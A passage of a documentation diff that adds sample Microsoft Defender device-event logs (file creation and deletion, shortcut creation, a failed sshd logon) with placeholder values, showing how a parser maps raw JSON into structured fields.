office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"Ac
tionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + 
"InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "parent": { + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } + + ``` + + === 
"test_device_file_certificate_info.json" ```json 
@@ -1032,7 +1438,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"time\":\"2022-09-01T07:49:40.4279379Z\",\"tenantId\":\"5ac3ff49-0e19-4600-9ad1-333e64e3b5cc\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"properties\":{\"PreviousFileName\":null,\"FileName\":\"OneDriveFileLauncher.exe\",\"FolderPath\":\"C:\\\\Users\\\\USER\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\22.161.0731.0002\",\"PreviousFolderPath\":null,\"SHA1\":null,\"SHA256\":null,\"MD5\":null,\"FileSize\":null,\"FileOriginReferrerUrl\":null,\"FileOriginUrl\":null,\"FileOriginIP\":null,\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestProtocol\":null,\"RequestAccountName\":null,\"RequestAccountDomain\":null,\"RequestAccountSid\":null,\"AdditionalFields\":null,\"ActionType\":\"FileDeleted\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft OneDrive\",\"InitiatingProcessVersionInfoProductVersion\":\"22.166.0807.0002\",\"InitiatingProcessVersionInfoInternalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoOriginalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft OneDrive (64 bit) 
Setup\",\"InitiatingProcessFolderPath\":\"c:\\\\users\\\\USER\\\\appdata\\\\local\\\\microsoft\\\\onedrive\\\\update\\\\onedrivesetup.exe\",\"InitiatingProcessFileSize\":56824728,\"InitiatingProcessMD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"InitiatingProcessSHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessSHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"InitiatingProcessAccountSid\":\"S-1-00-1-1111111-2222222222-3333333333-4444444444\",\"InitiatingProcessAccountDomain\":\"intranet\",\"InitiatingProcessAccountName\":\"group1\",\"InitiatingProcessAccountUpn\":\"user@example.org\",\"InitiatingProcessAccountObjectId\":\"9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2\",\"InitiatingProcessCreationTime\":\"2022-09-01T07:46:34.0214941Z\",\"InitiatingProcessId\":27512,\"InitiatingProcessFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessCommandLine\":\"OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode \",\"InitiatingProcessParentCreationTime\":\"2022-09-01T07:46:33.5858992Z\",\"InitiatingProcessParentId\":588,\"InitiatingProcessParentFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessIntegrityLevel\":\"Medium\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"DeviceId\":\"1111111111111111111111111111111111111111\",\"AppGuardContainerId\":\"\",\"MachineGroup\":\"UnassignedGroup\",\"Timestamp\":\"2022-09-01T07:46:42.4684081Z\",\"DeviceName\":\"test.lab\",\"ReportId\":152059}}", + "message": 
"{\"time\":\"2022-09-01T07:49:40.4279379Z\",\"tenantId\":\"5ac3ff49-0e19-4600-9ad1-333e64e3b5cc\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"properties\":{\"PreviousFileName\":null,\"FileName\":\"OneDriveFileLauncher.exe\",\"FolderPath\":\"C:\\\\Users\\\\USER\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\22.161.0731.0002\",\"PreviousFolderPath\":null,\"SHA1\":null,\"SHA256\":null,\"MD5\":null,\"FileSize\":null,\"FileOriginReferrerUrl\":null,\"FileOriginUrl\":null,\"FileOriginIP\":null,\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestProtocol\":null,\"RequestAccountName\":null,\"RequestAccountDomain\":null,\"RequestAccountSid\":null,\"AdditionalFields\":null,\"ActionType\":\"FileDeleted\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft OneDrive\",\"InitiatingProcessVersionInfoProductVersion\":\"22.166.0807.0002\",\"InitiatingProcessVersionInfoInternalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoOriginalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft OneDrive (64 bit) 
Setup\",\"InitiatingProcessFolderPath\":\"c:\\\\users\\\\USER\\\\appdata\\\\local\\\\microsoft\\\\onedrive\\\\update\\\\onedrivesetup.exe\",\"InitiatingProcessFileSize\":56824728,\"InitiatingProcessMD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"InitiatingProcessSHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessSHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"InitiatingProcessAccountSid\":\"S-1-00-1-1111111-2222222222-3333333333-4444444444\",\"InitiatingProcessAccountDomain\":\"intranet\",\"InitiatingProcessAccountName\":\"group1\",\"InitiatingProcessAccountUpn\":\"user@example.org\",\"InitiatingProcessAccountObjectId\":\"9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2\",\"InitiatingProcessCreationTime\":\"2022-09-01T07:46:34.0214941Z\",\"InitiatingProcessId\":27512,\"InitiatingProcessFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessCommandLine\":\"OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode \",\"InitiatingProcessParentCreationTime\":\"2022-09-01T07:46:33.5858992Z\",\"InitiatingProcessParentId\":588,\"InitiatingProcessParentFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessIntegrityLevel\":\"Medium\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"DeviceId\":\"1111111111111111111111111111111111111111\",\"AppGuardContainerId\":\"\",\"MachineGroup\":\"UnassignedGroup\",\"Timestamp\":\"2022-09-01T07:46:42.4684081Z\",\"DeviceName\":\"test.lab\",\"ReportId\":152059}}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-01T07:46:42.468408Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess 
/extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "InitiatingProcessFileSize": 56824728, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", + "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", + "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" + }, + "type": "FileDeleted" + }, + "file": { + "directory": "C:\\Users\\USER\\AppData\\Local\\Microsoft\\OneDrive\\22.161.0731.0002", + "name": "OneDriveFileLauncher.exe" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "test.lab" + }, + "microsoft": { + "defender": { + "report": { + "id": "152059" + } + } + }, + "process": { + "args": [ + "", + "/childprocess", + "/enableODSUReportingMode", + "/extractFilesWithLessThreadCount", + "/peruser", + "/removeNonCurrentVersions", + "/renameReplaceODSUExe", + "/renameReplaceOneDriveExe", + "/restart", + "/update", + "/updateSource:ODU" + ], + "command_line": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "executable": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update\\onedrivesetup.exe", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "OneDriveSetup.exe", + "parent": { + "name": "OneDriveSetup.exe", + "pid": 588, + "start": "2022-09-01T07:46:33.585899Z" + 
}, + "pid": 27512, + "start": "2022-09-01T07:46:34.021494Z", + "user": { + "domain": "intranet", + "email": "user@example.org", + "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "name": "group1" + }, + "working_directory": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ] + } + } + + ``` + + +=== "test_device_file_event_02.json" + + ```json + + { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account 
domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", "event": { "category": [ "file" 
@@ -1042,81 +1544,89 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2022-09-01T07:46:42.468408Z", + "@timestamp": "2024-11-08T14:38:51.904876Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "InitiatingProcessFileSize": 56824728, - "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", - "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", - "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" }, - "type": "FileDeleted" + "type": "FileCreated" }, "file": { - "directory": "C:\\Users\\USER\\AppData\\Local\\Microsoft\\OneDrive\\22.161.0731.0002", - "name": "OneDriveFileLauncher.exe" + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": 
"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 }, "host": { - "id": "1111111111111111111111111111111111111111", - "name": "test.lab" + "id": "123456789abcdef", + "name": "device.company.local" }, "microsoft": { "defender": { "report": { - "id": "152059" + "id": "341972" } } }, + "network": { + "protocol": "Local" + }, "process": { "args": [ - "", - "/childprocess", - "/enableODSUReportingMode", - "/extractFilesWithLessThreadCount", - "/peruser", - "/removeNonCurrentVersions", - "/renameReplaceODSUExe", - "/renameReplaceOneDriveExe", - "/restart", - "/update", - "/updateSource:ODU" + "/V" ], - "command_line": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "executable": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update\\onedrivesetup.exe", + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", "hash": { - "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", - "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", - "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" }, - "name": "OneDriveSetup.exe", + "name": "commandexec.exe", "parent": { - "name": "OneDriveSetup.exe", - "pid": 588, - "start": "2022-09-01T07:46:33.585899Z" + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" }, - "pid": 27512, - "start": "2022-09-01T07:46:34.021494Z", + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", "user": { - "domain": "intranet", - "email": "user@example.org", - "id": 
"S-1-00-1-1111111-2222222222-3333333333-4444444444", - "name": "group1" + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" }, - "working_directory": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update" + "working_directory": "c:\\windows\\system32" }, "related": { "hash": [ "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" } } 
@@ -1420,6 +1930,101 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_device_logon_failed.json" + + ```json + + { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- 
-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": 
\"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 
